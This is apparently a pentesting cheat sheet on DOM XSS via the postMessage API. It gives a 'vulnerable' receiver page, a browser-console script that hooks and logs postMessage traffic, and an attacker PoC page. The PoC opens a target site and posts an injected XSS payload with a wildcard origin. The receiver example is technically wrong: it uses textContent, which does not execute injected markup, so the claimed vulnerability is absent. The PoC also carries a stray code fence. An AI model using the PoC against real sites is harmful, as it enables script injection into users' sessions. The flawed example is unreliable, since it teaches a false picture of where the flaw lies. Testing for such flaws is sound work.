DOM-XSS via postMessage API

Vulnerable Receiver Example

• Listens for messages with addEventListener('message')

• Updates the paragraph content with the message without sanitization

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Receiver</title>
</head>
<body>
    <p>Message will appear here</p>
    <script>
        // Listen for incoming messages
        window.addEventListener('message', (event) => {
            // Validate the source and process data
            document.querySelector('p').textContent = event.data;
        });
    </script>
</body>
</html>

Messages identification

• Hook messages in your web application copying the following JS code in your Browser console:

  (function () {
  const LOG = (tag, color, data) =>
      console.log(`%c${tag}`, `background:#101;color:${color}`, data);
  
  const hooked = new WeakSet();
  
  function hookWindow(win, label) {
      if (!win || hooked.has(win)) return;
      hooked.add(win);
  
      try {
      const orig = win.postMessage;
      win.postMessage = function (data, targetOrigin, transfer) {
          LOG('postMessage OUT [' + label + ']', '#00CC00', {
          data,
          targetOrigin
          });
          return orig.apply(this, arguments);
      };
      } catch {}
  
      try {
      win.document.querySelectorAll('iframe').forEach(f => {
          try { hookWindow(f.contentWindow, 'iframe'); } catch {}
      });
      } catch {}
  
      try {
      new MutationObserver(m => {
          m.forEach(r =>
          r.addedNodes.forEach(n => {
              if (n.tagName === 'IFRAME') {
              try { hookWindow(n.contentWindow, 'iframe'); } catch {}
              }
          })
          );
      }).observe(win.document, { childList: true, subtree: true });
      } catch {}
  }
  
  // INCOMING
  window.addEventListener('message', e => {
      LOG('postMessage IN', '#FFD700', {
      from: e.origin,
      data: e.data
      });
  });
  
  hookWindow(window, 'top');
  
  LOG('postMessage hook', '#1CE', 'enabled');
  })();

• Analyze the postMessage IN messages identified by the previous Javascript code to understand which data are processed by the Web page listener

Exploitation

• Create the attacker web page with the XSS in the message of sent using the postMessage function. To do it, open the target URL and perform postMessage with 5 seconds delay, to be sure that the web application loads completely and starts all the workers

  <html>
      <head>
          <title>PoC</title>
      </head>
      <body>
          <script>
              function poc(){
                  var win = window.open('https://target.com/path');
  
                  var msg = <injected_DOM_XSS>
  
                  setTimeout(function(){
                  win.postMessage(JSON.stringify(msg), '*');
                  }, 5000);
              }
          </script>
          
          <a href="#" onclick="poc();">Test PoC</a>```
      </body>
  </html>

• The user visits the attacker web page and the target site will be opened by the script, allowing the execution of the DOM XSS